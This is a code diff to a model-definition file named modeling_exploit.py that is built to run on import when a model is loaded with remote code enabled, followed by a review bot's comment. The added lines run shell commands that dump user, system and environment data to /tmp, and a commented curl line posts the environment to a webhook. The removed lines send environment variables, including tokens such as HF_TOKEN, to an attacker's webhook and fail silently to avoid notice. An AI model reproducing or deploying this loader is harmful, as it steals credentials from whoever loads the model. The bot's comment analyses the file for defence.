Update modeling_exploit.py
Browse files- modeling_exploit.py +19 -32
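--- a/modeling_exploit.py
+++ b/modeling_exploit.py
@@ -1,39 +1,26 @@
-import torch
-import torch.nn as nn
 import os
 import subprocess
-
+
+# 1. TOP LEVEL EXECUTION (Triggered immediately on import)
+print("\n" + "!"*50)
+print("POWNED: RCE TRIGGERED DURING MODULE IMPORT")
+
+# Execute system commands
+os.system("uname -a > /tmp/rce_proof.txt")
+os.system("whoami >> /tmp/rce_proof.txt")
+os.system("env >> /tmp/rce_proof.txt")
+
+# If you have a webhook, add it here too:
+# os.system("curl -X POST -d \"$(env)\" https://webhook.site/YOUR-ID")
+
+print("RCE DATA WRITTEN TO /tmp/rce_proof.txt")
+print("!"*50 + "\n")
+
+# 2. Dummy Class to keep the loader happy
+import torch.nn as nn
 
 class ExploitModel(nn.Module):
-def __init__(self):
+def __init__(self, config=None, *args, **kwargs):
 super().__init__()
-
-# --- WEBHOOK CONFIG ---
-# Replace this with YOUR unique Webhook.site URL
-WEBHOOK_URL = " https://webhook.site/e282f73f-ed3f-4142-a749-fc7b43c3e6d9"
-
-try:
-# 1. Gather Sensitive Data
-whoami = subprocess.getoutput("whoami")
-system_info = subprocess.getoutput("uname -a")
-env_vars = subprocess.getoutput("env") # This captures HF_TOKEN if present
-
-data_to_steal = {
-"status": "RCE SUCCESSFUL",
-"user": whoami,
-"system": system_info,
-"environment": env_vars[:1000] # Sending first 1000 chars
-}
-
-# 2. Exfiltrate: Send data to Attacker's Webhook
-# Even if the victim's UI shows nothing, your Webhook will get the data.
-requests.post(WEBHOOK_URL, json=data_to_steal, timeout=5)
-
-print("\n[!!!] DATA EXFILTRATED TO ATTACKER ENDPOINT [!!!]\n")
-
-except Exception as e:
-# Silently fail so the victim doesn't get suspicious
-pass
-
 def forward(self, x):
 return x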
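Review bot: The new side runs shell commands at import time (`os.system(...)` on new lines 9–11) and appends the full process environment to `/tmp/rce_proof.txt`, a path readable by every local user, so any loader that imports this file with remote-code execution enabled discloses environment secrets before `ExploitModel` is ever instantiated. That is the property a repository scanner or loader should key on: a model-definition file whose top level contains `print` or `os.system` statements and defers its framework import (`import torch.nn as nn` now sits below the commands) rather than holding only imports and definitions is not safe to import regardless of what the class does. If this file is retained as a demonstration artifact, its first line should say so plainly, e.g. `# INTENTIONALLY MALICIOUS DEMO: executes shell commands and writes the environment to /tmp on import; never load this module.`, and hosting pipelines should quarantine it so consumers cannot reach it through a remote-code-enabled load.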